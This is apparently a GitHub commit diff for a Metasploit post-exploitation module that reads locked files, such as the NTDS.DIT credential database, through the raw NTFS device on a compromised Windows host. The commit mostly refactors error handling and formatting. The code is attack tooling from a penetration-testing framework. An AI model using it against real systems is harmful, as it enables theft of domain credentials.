33# Current source: https://github.com/rapid7/metasploit-framework
44##
55
6+ require 'rex/parser/fs/ntfs'
7+
68class Metasploit3 < Msf ::Post
79 include Msf ::Post ::Windows ::Priv
8- require "rex/parser/fs/ntfs"
910
1011 def initialize ( info = { } )
1112 super ( update_info ( info ,
1213 'Name' => 'Windows File Gathering In Raw NTFS' ,
13- 'Description' => %q{
14+ 'Description' => %q(
1415 This module gather file using the raw NTFS device, bypassing some Windows restriction.
1516 Gather file from disk bypassing restriction like already open file with write right lock.
16- Can be used to retreive file like NTDS.DIT
17- } ,
17+ Can be used to retreive file like NTDS.DIT) ,
1818 'License' => 'MSF_LICENSE' ,
1919 'Platform' => [ 'win' ] ,
2020 'SessionTypes' => [ 'meterpreter' ] ,
21- 'Author' => [ 'Danil Bazin <danil.bazin[at]hsc.fr>' ] , #@danilbaz
21+ 'Author' => [ 'Danil Bazin <danil.bazin[at]hsc.fr>' ] , # @danilbaz
2222 'References' => [
2323 [ 'URL' , 'http://www.amazon.com/System-Forensic-Analysis-Brian-Carrier/dp/0321268172/' ]
2424 ]
2525 ) )
26+
2627 register_options (
2728 [
2829 OptString . new ( 'FILE_PATH' , [ true , 'The FILE_PATH to retreive from the Volume raw device' , nil ] )
@@ -32,46 +33,46 @@ def initialize(info = {})
3233 def run
3334 winver = sysinfo [ "OS" ]
3435
35- if winver =~ /2000/i
36- print_error ( "Module not valid for Windows 2000" )
37- return
38- end
39-
40- unless is_admin?
41- print_error ( "You don't have enough privileges" )
42- return
43- end
36+ fail_with ( Exploit ::Failure ::NoTarget , 'Module not valid for Windows 2000' ) if winver =~ /2000/
37+ fail_with ( Exploit ::Failure ::NoAccess , 'You don\'t have administrative privileges' ) unless is_admin?
4438
4539 file_path = datastore [ 'FILE_PATH' ]
4640
4741 r = client . railgun . kernel32 . GetFileAttributesA ( file_path )
4842
4943 if r [ 'GetLastError' ] != 0
50- print_error ( "The file does not exist, use file format C:\\ \\ Windows\\ \\ System32\\ \\ drivers\\ \\ etc\\ \\ hosts" )
51- return nil
44+ fail_with (
45+ Exploit ::Failure ::BadConfig ,
46+ 'The file does not exist, use file format C:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts'
47+ )
5248 end
5349
5450 drive = file_path [ 0 , 2 ]
5551
56- r = client . railgun . kernel32 . CreateFileA ( "\\ \\ .\\ #{ drive } , "GENERIC_READ" , "FILE_SHARE_DELETE|FILE_SHARE_READ|FILE_SHARE_WRITE" ,
57- nil , "OPEN_EXISTING" , "FILE_FLAG_WRITE_THROUGH" , 0 )
52+ r = client . railgun . kernel32 . CreateFileA ( "\\ \\ .\\ #{ drive } ,
53+ 'GENERIC_READ' ,
54+ 'FILE_SHARE_DELETE|FILE_SHARE_READ|FILE_SHARE_WRITE' ,
55+ nil ,
56+ 'OPEN_EXISTING' ,
57+ 'FILE_FLAG_WRITE_THROUGH' ,
58+ 0 )
5859
5960 if r [ 'GetLastError' ] != 0
60- print_error ( "Error opening #{ drive } #{ r [ 'ErrorMessage' ] } )
61- return nil
61+ fail_with (
62+ Exploit ::Failure ::Unknown ,
63+ "Error opening #{ drive } #{ r [ 'GetLastError' ] } #{ r [ 'ErrorMessage' ] } )
6264 end
65+
6366 @handle = r [ 'return' ]
6467 print_status ( "Successfuly opened #{ drive } )
6568 begin
6669 fs = Rex ::Parser ::NTFS . new ( self )
67- print_status ( "Trying gather #{ file_path } )
70+ print_status ( "Trying to gather #{ file_path } )
6871 path = file_path [ 3 , file_path . length - 3 ]
6972 data = fs . file ( path )
7073 file_name = file_path . split ( "\\ " ) [ -1 ]
7174 stored_path = store_loot ( "windows.file" , 'application/octet-stream' , session , data , file_name , "Windows file" )
7275 print_good ( "Saving file : #{ stored_path } )
73- rescue ::Exception => e
74- print_error ( "Post failed : #{ e . backtrace } )
7576 ensure
7677 client . railgun . kernel32 . CloseHandle ( @handle )
7778 end
0 commit comments